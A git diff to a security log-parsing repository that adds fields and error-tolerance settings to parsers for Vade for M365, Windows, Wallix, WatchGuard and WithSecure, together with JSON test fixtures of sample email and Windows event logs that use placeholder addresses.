e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 -description: Vade for M365 offers all protections from Vade to our Microsoft 365 Email service +automation_connector_uuid: d3860745-4433-4690-b025-378369ad7201 +automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff +description: >- + Vade for M365 offers all protections from Vade to our Microsoft 365 Email service data_sources: Anti-virus: Vade performs behavioral-Based Anti-Malware Email gateway: Vade for M365 blocks attacks from the first email thanks to machine learning models that perform real-time behavioral analysis of the entire email, including any URLs and attachments. -automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml index 539de1df4..cbac9cd2d 100644 --- a/VadeSecure/vade_secure_m365/ingest/parser.yml +++ b/VadeSecure/vade_secure_m365/ingest/parser.yml @@ -56,6 +56,7 @@ stages: actions: - name: set set: + vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}" vadesecure.folder: "{{parse_json.message.folder}}" vadesecure.from_header: "{{parse_json.message.from_header}}" vadesecure.to_header: "{{parse_json.message.to_header}}" @@ -131,3 +132,7 @@ stages: - set: source.ip: "{{parse_json.message.sender_ip}}" filter: "{{parse_json.message.sender_ip| is_ipaddress}}" + + - set: + email.reply_to.address: "{{parse_json.message.reply_to_header}}" + filter: "{{parse_json.message.reply_to_header != ''}}" diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json new file mode 100644 index 000000000..7b2c0ae83 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_02.json @@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + "filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml index 5470c716c..7054d0a51 100644 --- a/Veeam/veeam_backup/ingest/parser.yml +++ b/Veeam/veeam_backup/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.UserName}}" output_field: user pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}' diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml index ed76d3f43..d9f1be434 100644 --- a/Wallix/wallix-bastion/ingest/parser.yml +++ b/Wallix/wallix-bastion/ingest/parser.yml @@ -2,6 +2,7 @@ name: wallix-bastion ignored_values: ["-"] pipeline: - name: parsed_event + filter: '{{not original.message.startswith("pam_unix(")}}' external: name: kv.parse-kv properties: diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json index da4487e2e..fdb9da3bc 100644 --- a/Wallix/wallix-bastion/tests/cron.json +++ b/Wallix/wallix-bastion/tests/cron.json @@ -15,7 +15,6 @@ }, "user": { "name": "root" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json index 5dd28b147..d7ce961b4 100644 --- a/Wallix/wallix-bastion/tests/pam_unix.json +++ b/Wallix/wallix-bastion/tests/pam_unix.json @@ -15,7 +15,6 @@ }, "user": { "name": "wabuser" - }, - "wallix": {} + } } } \ No newline at end of file diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 --- a/Wallix/wallix-bastion/tests/rexec.json +++ /dev/null @@ -1,12 +0,0 @@ -{ - "input": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation" - }, - "expected": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } -} \ No newline at end of file diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml index 23bdfd0d6..36e32c512 100644 --- a/WatchGuard/watchguard-firebox/ingest/parser.yml +++ b/WatchGuard/watchguard-firebox/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: message pattern: "%{DHCP}|%{USER_LOG}" diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 988ae3dbc..80474d3ce 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Message}}" output_field: result value_sep: ":" @@ -35,6 +36,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: "=" @@ -46,6 +48,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.Hashes or json.event.Hash}}" output_field: result value_sep: ":" @@ -84,6 +87,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.IpAddress}}" output_field: event pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}" @@ -94,6 +98,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_message_kv.result.Contents}}" output_field: event pattern: >- @@ -105,6 +110,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json.event.url or json.event.RemoteName}}" output_field: event pattern: >- @@ -116,6 +122,7 @@ pipeline: name: grok.match description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format. properties: + raise_errors: false input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}" @@ -128,6 +135,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: result pattern: >- @@ -139,6 +147,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}' output_field: event pattern: >- @@ -153,8 +162,7 @@ pipeline: - name: set_file - name: set_user - name: process_ids - - name: source_ip - - name: source_address + - name: set_source_fields - name: action_outcome - name: set_dll filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}" @@ -165,6 +173,8 @@ pipeline: - name: dns_fields - name: action_target - name: destination + - name: set_network_policy_fields + filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}" - name: rule - name: finalize @@ -1106,7 +1116,7 @@ stages: action.outcome: "failure" filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}" - source_ip: + set_source_fields: actions: - set: source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}" @@ -1131,8 +1141,6 @@ stages: - set: source.ip: "{{source_ip_ip_address.event.ip}}" - source_address: - actions: - set: source.address: "{{json.event.SourceIp}}" filter: "{{json.event.SourceIp | is_ipaddress}}" @@ -1153,6 +1161,17 @@ stages: source.address: "{{json_event.message.SourceAddr}}" filter: "{{json.event.SourceAddr | is_ipaddress}}" + set_network_policy_fields: + actions: + - set: + source.ip: "{{ json.event.CallingStationID }}" + filter: "{{json.event.CallingStationID | is_ipaddress}}" + - set: + source.mac: "{{ json.event.CallingStationID }}" + filter: "{{ final.source.ip == null }}" + - set: + destination.domain: "{{ json.event.AuthenticationServer }}" + rule: actions: - set: diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 4a3212af2..20213504d 100644 --- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json @@ -42,6 +42,14 @@ "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index 8ad5a2226..118cf2445 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -42,6 +42,14 @@ "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json index af1d9fe1d..3135f15c9 100644 --- a/Windows/windows/tests/process_6272.json +++ b/Windows/windows/tests/process_6272.json @@ -42,6 +42,11 @@ "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -63,12 +68,20 @@ }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml index 83bd21cff..3f8525c4d 100644 --- a/WithSecure/withsecure-elements/ingest/parser.yml +++ b/WithSecure/withsecure-elements/ingest/parser.yml @@ -17,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.details.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})" @@ -25,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.userName}}" output_field: user pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"